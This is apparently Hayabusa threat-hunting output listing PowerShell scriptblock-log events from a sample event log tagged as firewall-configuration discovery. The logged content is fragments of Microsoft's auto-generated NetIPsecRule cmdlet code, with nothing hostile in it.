'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewal",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'Group",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 